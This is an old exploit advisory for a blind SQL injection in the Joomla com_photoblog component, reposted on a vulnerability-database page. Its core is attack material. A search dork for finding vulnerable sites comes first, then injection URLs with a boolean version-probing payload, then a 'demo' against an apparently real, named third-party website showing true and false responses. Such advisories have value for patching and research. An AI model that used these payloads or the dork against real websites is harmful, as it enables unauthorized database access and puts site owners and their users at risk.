Joomla Photoblog Blind SQL Injection

🗓️ 08 Feb 2010 00:00:00Reported by altbtaType

packetstorm🔗 packetstormsecurity.com👁 27 Views

Joomla com_photoblog has a Blind SQL Injection vulnerability allowing unauthorized data access.

`  
  
Joomla (com_photoblog) Blind Sql Injection Vulnerability  
========================================================  
  
####################################################################  
.:. Author : ALTBTA [[email protected]]  
.:. Home : v4-team.com/cc<http://v4-team.com/cc>  
.:. Script : Joomla  
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1  
.:. Bug Type : Blind Sql Injection  
.:. Dork : inurl:"com_photoblog"  
  
####################################################################  
  
===[ Exploit ]===  
  
www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION]  
  
  
www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5  
  
demo  
  
http://www.edhardybabyproducts.eu/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and%20substring%28@@version,1,1%29=5 >>> True  
http://www.edhardybabyproducts.eu/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and%20substring%28@@version,1,1%29=4 >>> False  
  
  
####################################################################  
  
Greats T0: aB0-3tH4b T3rR0r & RxH  
  
  
  
`

08 Feb 2010 00:00Current

0.5Low risk

Vulners AI Score0.5